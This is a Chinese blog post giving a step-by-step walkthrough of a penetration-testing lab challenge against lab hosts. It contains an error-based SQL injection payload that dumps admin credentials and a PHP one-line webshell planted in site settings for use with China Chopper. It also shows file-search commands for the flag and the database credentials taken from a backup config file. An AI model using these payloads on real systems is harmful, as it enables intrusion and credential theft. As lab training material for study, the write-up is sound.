在线挑战详细攻略-《渗透测试笔记》

Step 01

> 目标地址:172.16.12.2 172.16.12.3(注意:本实验中一共有两个目标地址)

本机地址:172.16.11.2

第一题的要求是获取ww.test.ichunqiu后台登录密码。

首先打开浏览器,进入首页ww.test.ichunqiu, 自己注册一个账户,进入 [会员中心],点击左侧菜单 [专题管理] 下的 [创建专题],详情如下图所示:

> 专题名称、专题分类、权限设置、专题封面等信息自由填写;

> 专题创建完毕之后,点击 [专题管理],在右边的专题列表中选中刚才创建的专题,点击进入,查看URL地址,记住这个ID,后面需要这个ID;

> 打开浏览器的HackBar,在URL中输入以下信息:

http://www.test.ichunqiu/member/special.php?

job=show_BBSiframe&type=myatc&id=12&

TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,

((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23

请求完毕后可以很明显的看出,响应包返回的报错信息中,包含了管理员的用户名和一部分密码hash值,不过MD5长度不够,没关系,继续往下看;

> 在确定了管理员用户名为admin之后,继续修改刚才的exp,曝出完整hash

http://www.test.ichunqiu/member/special.php?

job=show_BBSiframe&type=myatc&id=12&

TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0,

((select concat(password) from qb_members limit 0,1))),0) %23

> 执行exp之后,32位的MD5值完美呈现,破解后获得明文密码:whoami!@#123,这就是第一题的答案,继续看第二步。

Step 02

> 第二题的要求是获取目标服务器1管理员桌面的Flag文件信息。

打开后台地址,输入之前获得的管理员用户名和密码;(后台地址是/admin,不会的童鞋用想念御剑一类的工具一跑就出来了)

> 成功登入后台管理系统,网站管理员权限!

下一步的目标是挂马,getshell

点击顶部菜单栏中的 [系统功能],再在对应的左侧菜单中点 [击全局参数设置],在右侧页面内容中找到 [网站备案号] 一栏,把一句话木马写入该处:

<?php @assert($_POST['ichunqiu']);?>

注意:这里不能使用eval,否则会被截断,会木马无法正常执行,不信你可以试一试~

然后点击页面下方的 [保存] 设置进行保存。一般情况下,网站页面的底部都会放网站备案信息,所以把一句话木马放在这里,方便利用。

> 继续点击左侧菜单中的 [频道独立页管理],在后侧页面内容中点击 [添加频道页],频道页名称任意输入,程序文件名无需修改,静态文件名:xxx.php,特!别!注!意!,扩展名须是php的,不然菜刀连不上;这三个信息填写完毕之后,点击下方的 [提交] 按钮,进行页面的保存操作;

> 新增的频道页保存成功之后,列表中会新增一条信息,如下所示:

> 最关键的时刻到来了,点击 [静态化] 按钮,对页面进行静态化处理!

> 出现如下页面说明静态化操作成功!此时的木马已经被默默的挂在了页面的底部,就存放在网站备案信息那里~

> 请出久违的菜刀同志,新增一条记录,URL信息就是刚才静态化过的页面地址,注意"连接密码"一定要跟一句话木马中的信息保持一致:

> 双击进入,成功!不过Flag还没找到呢,继续~

> 回到菜刀列表页面,在URL上右击,在弹出菜单中选择 [虚拟终端]:

> 进入虚拟终端后,教大家一个简单方法找Flag文件,直接在C盘根目录下,输入命令:

dir /s *flag*.txt

即可找到桌面文件下的Flag文件,type一下就能看到flag值。

这里特别说明一下,Flag文件中的内容是Key{636bb37e},但是在提交第二题答案的时候,只需要提交大括号中的8位字符即可,否则你永远得不了100分~

Step 03

> 第三题的要求是获取网站论坛数据库中admin的盐值,注意,不是网站数据库,是论坛数据库!

论坛的地址是bbs.test.ichunqiu, IP地址是172.16.12.3

在网站目录下发现一个dedecms_bak文件夹,该目录下的/data/common.inc.php文件就是论坛数据库的配置文件,准确说是配置文件的备份,里面有连接数据库需要的有用信息:

> 再次回到菜刀列表界面,在URL上点击右键,选择 [编辑],在配置栏中,输入刚才获得的数据库配置信息:

<T>MYSQL</T> <H>172.16.12.3</H> <U>root</U> <P>opiznmzs&**</P> <L>gbk</L>

配置信息输入完毕之后,点击界面上的 [编辑] 按钮完成此次信息修改;

> 激动人心的时刻终于来了,在URL上点右键,选择 [数据库管理]:

> 成功获取数据库信息,盐值在ultrax数据库下pre_ucenter_members表中,至于怎么知道盐值在这个位置的,我是在本地搭建了环境,自己一个一个翻出来的,方法比较笨,你如果有好的方法,还望多多指正!

>

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏PPV课数据科学社区

大数据系列(4)——Hadoop集群VSFTP和SecureCRT安装配置

前言 经过前三篇文章的介绍,已经通过VMware安装了Hadoop的集群环境,当然,我相信安装的过程肯定遇到或多或少的问题,这些都需要自己解决,解决的过程就是学...

3214
来自专栏PHP技术大全

Web安全开发规范手册V1.0

团队最近频繁遭受网络攻击,引起了部门技术负责人的重视,笔者在团队中相对来说更懂安全,因此花了点时间编辑了一份安全开发自检清单,觉得应该也有不少读者有需要,所以将...

2030
来自专栏.NET后端开发

ADO.NET入门教程(五) 细说数据库连接池

题外话 通过前几章的学习,不知道大家对ADO.NET有一定的了解了没有。撇开文章质量不讲,必须肯定的是,我是用心去写每一篇文章的。无论是是在排版上,还是在内容选...

4199
来自专栏散尽浮华

GlusterFS分布式存储数据的恢复机制(AFR)的说明

GlusterFSFS恢复数据都是基于副本卷来说的,GlusterFSFS复制卷是采用镜像的方式做的,并且是同步事务性操作。简单来说就是,某一个客户要写文件时,...

5605
来自专栏ChaMd5安全团队

文件上传漏洞的一些总结

0x00 前言 在跟p猫的py交易后,写下了这篇文章,根据之前写文章后表哥给予的一些改进建议,尽量在这篇文章中写得更加详细。因为本人技术水平有限菜的要死,所以...

7856
来自专栏蓝天

LINUX系统性能调谐

邓延军 (deng.yanjun@163.com), 硕士研究生, 西安电子科技大学软件工程研究所

1812
来自专栏JMCui

Hybris安装和各个Extention简单介绍

前言:突然想好好梳理一下这几个月所学的内容了,顺便让自己的知识有一个系统的框架。这种安装仅仅适用于开发环境,不适于生产环境。 一、  安装JDK 请安装最新的O...

49811
来自专栏安全领域

使用JavaScript开发物联网设备也会非常安全

本文将引导你完成一个练习,向你展示如何在 IoTivity 安全框架上使用 Java 对 OCF 设备进行快速原型设计。

49310
来自专栏F-Stack的专栏

F-Stack Q&A 第一期

Q1:F-Stack有中断模式吗,有计划支持吗?在计算密集型的应用中,轮询模式会占用更多的CPU资源? A1:F-Stack暂时只支持轮询模式,后续会支持中断+...

7035
来自专栏耕耘实录

DNS主从服务器中域(zone)文件类型不一致问题的解决方法

版权声明:本文为耕耘实录原创文章,各大自媒体平台同步更新。欢迎转载,转载请注明出处,谢谢

1194

扫码关注云+社区

领取腾讯云代金券